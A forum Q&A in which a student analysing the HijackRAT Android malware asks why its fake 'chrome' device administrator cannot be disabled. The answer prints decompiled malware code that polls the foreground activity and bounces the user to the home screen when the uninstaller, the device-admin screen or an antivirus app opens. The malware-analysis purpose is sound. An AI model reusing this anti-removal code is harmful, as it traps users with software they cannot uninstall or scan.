# android device administrators can not be disabled?

Tags: android, malware, device-admin

i am currently studying an android malware "hijack rat" as a part of my university course . this application create a device administrator under the name "chrome". the problem is that the device administrator can not be disable. whenever i click on it it goes to the phone homepage.

what is the code for this action?

PS: this behavior (jump to the main screen) only happen in real devices not emulators. tested on Samsung galaxy s4 kitkat and nexus 6 marshmallow.

you can see the video that i make:
https://www.youtube.com/watch?v=XAF5xEad-fU

apk source:
http://contagiominidump.blogspot.com/2015/06/androidoswrobax-hijackrat-android-sample.html

Comment: i find a piece of code that can be relate to this behavior, although i am not 100% sure as the behavior does not happen all the time on all devices or android versions.  [link]( https://www.youtube.com/watch?v=t64_jXaRl_Q)

Answer (score 1):

```
    this.timer.schedule(new TimerTask() {
        public void run() {
            new Handler(Plugin.this.service.getMainLooper()).post(new Runnable() {
                public void run() {
                    boolean kill;
                    String name = Plugin.getTopActivityName(Plugin.this.service);
                    if (name == null || !name.startsWith("com.estsoft.alyac.ui")) {
                        kill = false;
                    } else {
                        kill = true;
                    }
                    if (!kill) {
                        if (name == null || !name.contains("packageinstaller.UninstallerActivity")) {
                            kill = false;
                        } else {
                            kill = true;
                        }
                        if (kill) {
                            for (String pkg : Plugin.oldPackageList) {
                                if (Plugin.isAvilible(Plugin.this.service, pkg)) {
                                    kill = false;
                                    break;
                                }
                            }
                            if (kill && Plugin.isAvilible(Plugin.this.service, Plugin.V3_PACKAGE)) {
                                kill = false;
                            }
                        }
                    }
                    if (!kill) {
                        if (name == null || !name.contains(".DeviceAdminAdd")) {
                            kill = false;
                        } else {
                            kill = true;
                        }
                        boolean mdarEnabled = devicePref.getBoolean("mdar", false);
                        if (kill && !mdarEnabled) {
                            kill = false;
                        }
                    }
                    if (kill) {
                        Intent intent = new Intent("android.intent.action.MAIN");
                        intent.addCategory("android.intent.category.HOME");
                        intent.addFlags(268435456);
                        Plugin.this.service.startActivity(intent);
                    }
                }
            });
        }
    }, 2000, 200);
```